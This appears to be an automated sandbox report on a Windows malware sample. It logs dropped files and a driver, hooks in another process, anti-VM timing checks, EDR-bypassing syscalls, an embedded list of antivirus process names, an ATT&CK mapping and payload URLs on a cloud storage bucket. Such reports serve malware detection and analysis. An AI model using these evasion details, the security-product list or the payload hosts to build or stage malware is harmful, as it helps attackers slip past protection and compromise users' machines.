Source:	Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb source: KHoDN.76532.10.exe

Source: KHoDN.76532.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KHoDN.76532.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KHoDN.76532.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KHoDN.76532.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KHoDN.76532.10.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Documents\vIPphI.exe

Code function: 7_2_00007FF79EE6190C GetCurrentProcessId,ProcessIdToSessionId,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetFileAttributesW,GetLastError,FileTimeToLocalFileTime,FileTimeToSystemTime,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LocalFree,FileTimeToLocalFileTime,FileTimeToSystemTime,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LocalFree,FreeLibrary,

7_2_00007FF79EE6190C

Source: initial sample

Static PE information: section where entry point is pointing to: .{,3

Source: KHoDN.76532.10.exe	Static PE information: section name: .gxfg
Source: KHoDN.76532.10.exe	Static PE information: section name: .gehcont
Source: vIPphI.exe.0.dr	Static PE information: section name: _RDATA
Source: eToken.dll.0.dr	Static PE information: section name: .QO
Source: eToken.dll.0.dr	Static PE information: section name: .h1c
Source: eToken.dll.0.dr	Static PE information: section name: .{,3

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	File created: C:\Users\user\Documents\eToken.dll			Jump to dropped file
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	File created: C:\Users\user\Documents\vIPphI.exe			Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

File created: C:\Windows\Temp\aceprocted.sys

Jump to behavior

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	File created: C:\Windows\Temp\aceprocted.sys	Jump to dropped file
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	File created: C:\Users\user\Documents\eToken.dll	Jump to dropped file
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	File created: C:\Users\user\Documents\vIPphI.exe	Jump to dropped file

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

File created: C:\Windows\Temp\aceprocted.sys

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\vIPphI.exe	Memory written: PID: 3504 base: 7FF84F910008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	Memory written: PID: 3504 base: 7FF84F7AD9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	Memory written: PID: 3504 base: 7FF84F920005 value: E9 EB D9 E8 FF	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	Memory written: PID: 3504 base: 7FF84F7AD9F0 value: E9 1A 26 17 00	Jump to behavior

Source: C:\Users\user\Documents\vIPphI.exe

Code function: 7_2_00007FF79EE61000 GetCurrentThreadId,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentThreadId,Sleep,

7_2_00007FF79EE61000

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: GETDATAC:\USERS\TTRUESPANL.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXE360TRAY.EXEZHUDONGFANGYU.EXELIVEUPDATE360.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXESRAGENT.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXEKANKAN.EXESUPERKILLER.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKAVSERVICE.EXEBKAVSYSTEMSERVER.EXEBKAVSYSTEMSERVICE.EXEBKAVSYSTEMSERVICE64.EXEBKAVUTIL.EXEBLUPRO.EXEBLUPROSERVICE.EXECEFUTIL.EXEPOPWNDLOG.EXEPROMOUTIL.EXEQHACTIVEDEFENSE.EXEQHSAFEMAIN.EXEQHS
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	RDTSC instruction interceptor: First address: 1400011F0 second address: 140001207 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	RDTSC instruction interceptor: First address: 140001207 second address: 140001207 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007FB7286C3B00h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	RDTSC instruction interceptor: First address: 1BA603 second address: 1BA603 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 mov ecx, dword ptr [esp+24h] 0x0000000d add ecx, eax 0x0000000f mov eax, ecx 0x00000011 mov dword ptr [esp+24h], eax 0x00000015 jmp 00007FB728974A37h 0x00000017 mov eax, dword ptr [esp+20h] 0x0000001b inc eax 0x0000001d mov dword ptr [esp+20h], eax 0x00000021 cmp dword ptr [esp+20h], 000003E8h 0x00000029 jnl 00007FB728974A79h 0x0000002b rdtsc

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Window / User API: threadDelayed 589			Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	Window / User API: threadDelayed 410			Jump to behavior

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

Dropped PE file which has not been started: C:\Windows\Temp\aceprocted.sys

Jump to dropped file

Source: C:\Users\user\Documents\vIPphI.exe

API coverage: 2.0 %

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe TID: 8568	Thread sleep count: 589 > 30	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe TID: 8568	Thread sleep time: -294500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe TID: 8568	Thread sleep count: 410 > 30	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe TID: 8568	Thread sleep time: -205000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\vIPphI.exe

Code function: 7_2_00007FF79EE69AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,

7_2_00007FF79EE69AE0

Source: C:\Users\user\Desktop\KHoDN.76532.10.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\vIPphI.exe

Code function: 7_2_00007FF79EE64330 LdrLoadDll,

7_2_00007FF79EE64330

Source: C:\Users\user\Documents\vIPphI.exe

Code function: 7_2_00007FF79EE68904 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00007FF79EE68904

Source: C:\Users\user\Documents\vIPphI.exe

7_2_00007FF79EE6190C

Source: C:\Users\user\Documents\vIPphI.exe

Code function: 7_2_00007FF79EE6C070 GetProcessHeap,

7_2_00007FF79EE6C070

Source: C:\Users\user\Documents\vIPphI.exe	Code function: 7_2_00007FF79EE68904 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		7_2_00007FF79EE68904
Source: C:\Users\user\Documents\vIPphI.exe	Code function: 7_2_00007FF79EE629A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_00007FF79EE629A0

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\vIPphI.exe	NtAllocateVirtualMemory: Indirect: 0x7FF79EE63FE4	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Direct from: 0x7FF82810D668	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Indirect: 0x20A56775E51	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Direct from: 0x7FF8280D12CC	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Direct from: 0x7FF827E32615	Jump to behavior
Source: C:\Users\user\Desktop\KHoDN.76532.10.exe	NtDelayExecution: Indirect: 0x1B9ED8	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtMapViewOfSection: Direct from: 0x7FF82800A70A	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Direct from: 0x7FF8280CCC47	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtOpenFile: Direct from: 0x7FF827E1E67E	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtUnmapViewOfSection: Direct from: 0x7FF8280418B1	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Direct from: 0x7FF8280B0D32	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Indirect: 0x7FF827DE497B	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Direct from: 0x7FF8280BF94A	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtClose: Direct from: 0x7FF827FF7F6C
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Direct from: 0x7FF828010C71	Jump to behavior
Source: C:\Users\user\Documents\vIPphI.exe	NtProtectVirtualMemory: Direct from: 0x7FF82800C205	Jump to behavior

Source: C:\Users\user\Documents\vIPphI.exe

Code function: 7_2_00007FF79EE6F750 cpuid

7_2_00007FF79EE6F750

Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KWatch.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: vIPphI.exe, 00000007.00000002.2426076971.0000020A56539000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	11 Masquerading	1 Credential API Hooking	23 Security Software Discovery	Remote Services	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	111 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KHoDN.76532.10.exe	18%	Virustotal		Browse
KHoDN.76532.10.exe	100%	Avira	HEUR/AGEN.1316962

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Documents\vIPphI.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://f3rf3r.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
http://www.mohawkgroup.com/segments/hospitality)	0%	Avira URL Cloud	safe
http://www.jeffalpaugh.com/)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/b	0%	Avira URL Cloud	safe
http://prismstandard.org/namespaces/prismusagerights/2.1/	0%	Avira URL Cloud	safe
http://www.guestsupply.ca/)	0%	Avira URL Cloud	safe
http://www.simmonscanada.com/)	0%	Avira URL Cloud	safe
http://www.kingswoodpark.ca/golf)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/F	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/	0%	Avira URL Cloud	safe
http://www.radisson.com/fredericton-nb)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/v	0%	Avira URL Cloud	safe
http://www.emhlaw.com/)	0%	Avira URL Cloud	safe
http://www.macinteriordesign.com/)	0%	Avira URL Cloud	safe
http://www.vatransport.com/)	0%	Avira URL Cloud	safe
http://www.corporate.nestle.ca/en)	0%	Avira URL Cloud	safe
http://www.crowneplaza.com/moncton/crowneplaza)	0%	Avira URL Cloud	safe
http://www.campio-group.com/)	0%	Avira URL Cloud	safe
http://www.hotelfaubourgmontreal.com/)	0%	Avira URL Cloud	safe
http://www.textilespatlin.com/)	0%	Avira URL Cloud	safe
http://www.chocolatelakehotel.com/)	0%	Avira URL Cloud	safe
http://www.cesdistribution.com/)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/d	0%	Avira URL Cloud	safe
http://www.kingswoodpark.ca/)	0%	Avira URL Cloud	safe
http://www.centuryamadeus.com/)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gif8	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gifW5	0%	Avira URL Cloud	safe
http://www.iab.net/guidelines/508676/508767/displayguidelines)	0%	Avira URL Cloud	safe
http://www.crowneplaza.com/fredericton/corwneplaza)	0%	Avira URL Cloud	safe
http://www.mohawkgroup.com/durkan)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
http://www.gfscanada.com/)	0%	Avira URL Cloud	safe
http://www.hamptoninntruro.com/)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
http://www.radissonhotelgroup.com/)	0%	Avira URL Cloud	safe
http://www.mountainviewsuites.ca/)	0%	Avira URL Cloud	safe
http://www.cocacola.ca/)	0%	Avira URL Cloud	safe
http://www.meublesjlm.com/)	0%	Avira URL Cloud	safe
http://www.embassysuites3.hilton.com/)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/4	0%	Avira URL Cloud	safe
http://www.capebretonresorts.com/)	0%	Avira URL Cloud	safe
http://www.renwil.com/)	0%	Avira URL Cloud	safe
http://www.candlewoodsuites.com/montrea)	0%	Avira URL Cloud	safe
http://www.irvingenergy.ca/)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gifhttps://f3rf3r.oss-cn-beijing.aliyuncs.com/b.gifhttp	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gif#5	0%	Avira URL Cloud	safe
http://www.dine-art.com/)	0%	Avira URL Cloud	safe
http://www.super8amherst.com/)	0%	Avira URL Cloud	safe
https://f3rf3r.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
http://www.gktw.org/)	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sc-2jiu.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.80	true	false		unknown
f3rf3r.oss-cn-beijing.aliyuncs.com	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://f3rf3r.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.mohawkgroup.com/segments/hospitality)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.kingswoodpark.ca/golf)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net05	KHoDN.76532.10.exe	false		high
http://ocsp.sectigo.com0	vIPphI.exe.0.dr	false		high
http://ocsp.entrust.net03	KHoDN.76532.10.exe	false		high
http://ocsp.entrust.net02	KHoDN.76532.10.exe	false		high
http://www.guestsupply.ca/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net00	KHoDN.76532.10.exe	false		high
http://www.simmonscanada.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B96000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/b	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://prismstandard.org/namespaces/prismusagerights/2.1/	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/F	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jeffalpaugh.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.eastlink.ca/)	KHoDN.76532.10.exe	false		high
http://www.rogers.com/)	KHoDN.76532.10.exe	false		high
http://www.radisson.com/fredericton-nb)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.emhlaw.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/v	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.textilespatlin.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/g2ca.crl0;	KHoDN.76532.10.exe	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	aceprocted.sys.0.dr	false		high
http://www.corporate.nestle.ca/en)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
https://youtu.be/sDsXDjXYycQ)	KHoDN.76532.10.exe	false		high
http://www.vatransport.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/evcs1.crl0	KHoDN.76532.10.exe	false		high
http://www.crowneplaza.com/moncton/crowneplaza)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.campio-group.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.hotelfaubourgmontreal.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.macinteriordesign.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.cesdistribution.com/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
https://f3rf3r.oss-cn-beijing.aliyuncs.com/d	KHoDN.76532.10.exe, 00000000.00000003.2195560602.0000000000B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kingswoodpark.ca/)	KHoDN.76532.10.exe	false	Avira URL Cloud: safe	unknown
http://www.holidayinn.com/truro)	KHoDN.76532.10.exe	false		high
